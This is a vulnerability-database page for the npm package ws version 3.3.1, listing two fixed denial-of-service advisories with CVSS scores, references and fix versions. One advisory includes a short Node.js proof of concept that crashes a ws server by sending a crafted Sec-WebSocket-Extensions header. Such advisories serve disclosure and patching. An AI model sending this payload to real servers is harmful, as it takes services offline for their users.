Django REST framework

Package Instance

Lookup for vulnerable packages by Package URL.

Purlpkg:npm/ws@3.3.1
Typenpm
Namespace
Namews
Version3.3.1
Qualifiers
Subpath
Is_vulnerablefalse
Next_non_vulnerable_version5.2.3
Latest_non_vulnerable_version8.20.1
Affected_by_vulnerabilities
Fixing_vulnerabilities
0
url VCID-4851-mkc2-pqdw
vulnerability_id VCID-4851-mkc2-pqdw
summary 
Denial of Service
A specially crafted value of the `Sec-WebSocket-Extensions` header that uses `Object.prototype` property names as extension or parameter names can be used to make a `ws` server crash.
references
0
reference_url https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a
reference_id
reference_type
scores
url https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a
1
reference_url https://github.com/websockets/ws/releases/tag/3.3.1
reference_id
reference_type
scores
url https://github.com/websockets/ws/releases/tag/3.3.1
fixed_packages
0
url pkg:npm/ws@3.3.1
purl pkg:npm/ws@3.3.1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ws@3.3.1
aliases GMS-2017-331
risk_score null
exploitability 0.5
weighted_severity 0.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4851-mkc2-pqdw
1
url VCID-4u5m-kp7t-x3cf
vulnerability_id VCID-4u5m-kp7t-x3cf
summary 
Denial of Service in ws
Affected versions of `ws` can crash when a specially crafted `Sec-WebSocket-Extensions` header containing `Object.prototype` property names as extension or parameter names is sent.

## Proof of concept

```
const WebSocket = require('ws');
const net = require('net');

const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor';  // or ',;constructor'

  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r'
  ].join('\r');

  const socket = net.connect(3000, function () {
    socket.resume();
    socket.write(request);
  });
});
```


## Recommendation

Update to version 3.3.1 or later.
references
0
reference_url https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a
1
reference_url https://github.com/websockets/ws/commit/f8fdcd40ac8be7318a6ee41f5ceb7e77c995b407
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/websockets/ws/commit/f8fdcd40ac8be7318a6ee41f5ceb7e77c995b407
2
reference_url https://nodesecurity.io/advisories/550
reference_id
reference_type
scores
url https://nodesecurity.io/advisories/550
3
reference_url https://snyk.io/vuln/npm:ws:20171108
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://snyk.io/vuln/npm:ws:20171108
4
reference_url https://www.npmjs.com/advisories/550
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.npmjs.com/advisories/550
5
reference_url https://www.npmjs.com/advisories/550/versions
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.npmjs.com/advisories/550/versions
6
reference_url https://github.com/advisories/GHSA-5v72-xg48-5rpm
reference_id GHSA-5v72-xg48-5rpm
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-5v72-xg48-5rpm
fixed_packages
0
url pkg:npm/ws@1.1.5
purl pkg:npm/ws@1.1.5
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ws@1.1.5
1
url pkg:npm/ws@3.3.1
purl pkg:npm/ws@3.3.1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ws@3.3.1
aliases GHSA-5v72-xg48-5rpm, GMS-2019-145
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4u5m-kp7t-x3cf
Risk_scorenull
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:npm/ws@3.3.1